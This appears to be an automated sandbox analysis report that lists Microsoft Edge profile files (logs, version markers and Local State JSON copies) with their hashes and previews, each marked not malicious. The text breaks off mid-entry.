                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.217753065412729
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NkRB3+q2PN723oH+TcwtfrK+IFUt8E22NZmw+E22RVkwON723oH+TcwtfrUeLJ:WcvVaYeb23FUt8J2N/+J2/5OaYeb3J
                                                                                                                                                                                                                                                                                                        MD5:506871B8D8519B8E1FB85A28319C13DC
                                                                                                                                                                                                                                                                                                        SHA1:80AB6F2E965B0619044228F16C40DCC5A662C73D
                                                                                                                                                                                                                                                                                                        SHA-256:59369C21B99E9C5960F5C6080BA48195DC8E759EA20298CC7D9EC8548CA6AEBB
                                                                                                                                                                                                                                                                                                        SHA-512:2408D729E52D6D15C56AEAF9162610B7F06DDC8B13CDB20B6A443D38267AE39BA1810EE16A0788B873133BD278578C5297883B8DD221FB1F9E6A395D17085EA0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.614 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/24-13:28:20.709 db8 Recovering log #3.2024/12/24-13:28:20.709 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):816
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                        MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                        SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                        SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                        SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):343
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.185833633790373
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NUt+q2PN723oH+TcwtfrzAdIFUt8EkV7ZZmw+EkaVkwON723oH+TcwtfrzILJ:jvVaYeb9FUt877Z/+s5OaYeb2J
                                                                                                                                                                                                                                                                                                        MD5:A3D8113B4A4A5C25A98B5268BC4161D1
                                                                                                                                                                                                                                                                                                        SHA1:FF01A389652815B8C12FC63382D72ED0832B7FEB
                                                                                                                                                                                                                                                                                                        SHA-256:28E526D91020ECD34F887058D82DA24995A9D50FB4A99AA1422CA985FE70F6E0
                                                                                                                                                                                                                                                                                                        SHA-512:2A403AE63BE418F6D319D7FD52F02090FEEDAB1A5D7F5989AD138E51A4404D49E5EC3AB7AA80EB2D0AB237907D500C0E884B359667A158170FF131EE22EBA1F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.609 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/24-13:28:20.610 db8 Recovering log #3.2024/12/24-13:28:20.611 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):343
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.185833633790373
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NUt+q2PN723oH+TcwtfrzAdIFUt8EkV7ZZmw+EkaVkwON723oH+TcwtfrzILJ:jvVaYeb9FUt877Z/+s5OaYeb2J
                                                                                                                                                                                                                                                                                                        MD5:A3D8113B4A4A5C25A98B5268BC4161D1
                                                                                                                                                                                                                                                                                                        SHA1:FF01A389652815B8C12FC63382D72ED0832B7FEB
                                                                                                                                                                                                                                                                                                        SHA-256:28E526D91020ECD34F887058D82DA24995A9D50FB4A99AA1422CA985FE70F6E0
                                                                                                                                                                                                                                                                                                        SHA-512:2A403AE63BE418F6D319D7FD52F02090FEEDAB1A5D7F5989AD138E51A4404D49E5EC3AB7AA80EB2D0AB237907D500C0E884B359667A158170FF131EE22EBA1F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.609 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/24-13:28:20.610 db8 Recovering log #3.2024/12/24-13:28:20.611 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                        MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                        SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                        SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                        SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.55

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45dcc.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45dfb.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46166.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF461b4.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48912.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF489cd.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
